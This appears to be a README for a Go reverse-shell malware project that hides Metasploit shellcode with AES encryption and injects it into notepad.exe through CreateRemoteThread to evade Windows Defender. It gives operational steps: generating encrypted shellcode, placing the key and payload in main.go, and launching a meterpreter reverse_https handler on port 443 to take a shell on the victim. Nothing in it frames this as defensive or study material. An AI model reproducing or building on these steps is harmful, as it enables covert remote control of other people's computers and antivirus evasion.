A simple HTTPS reverse shell malware implementation written in Go, evading Windows Defender detection via AES
- It looks like
notepad.exehas spawned, but the malicious script artifically generated via msfconsole got injected asCreateRemoteThreadWINAPI function, even though Windows Defender's "real time protection" is activated.
- If the attacker(red team)'s server is connected to the victim, reversed HTTPS shell will provide shell interface to interact with victim's device, as long as shellcode-injected target process runs on the victim.
- Prepare your Kali Linux or other available systems that can use
msfconsole(metasploit console). - Make sure that the victim and the attacker is connected.
- Run
utility/createShellcode.shon the attacker's device to get AES key, AES IV(Initialize Vector), and encryped shell script - At
main.go, replace the values of variablesmaliciousShellcodeBytes(Encrypted shell code. Decryption will be automatically perform),aesKey, andaesInitialVectorto yours. Refer to the originalmain.go's code. - Return to the attacker's msfconsole, and ready to receive the victim's reverse shell connection.
attacker@readteam-kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf exploit(handler) > set LHOST 0.0.0.0
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
- Run the exploit code(
main.go) at victim. (Either directly runmain.gowithgo runcommand or execute the program after building work the same.)
- Why did you suddenly make this? - I was just curious.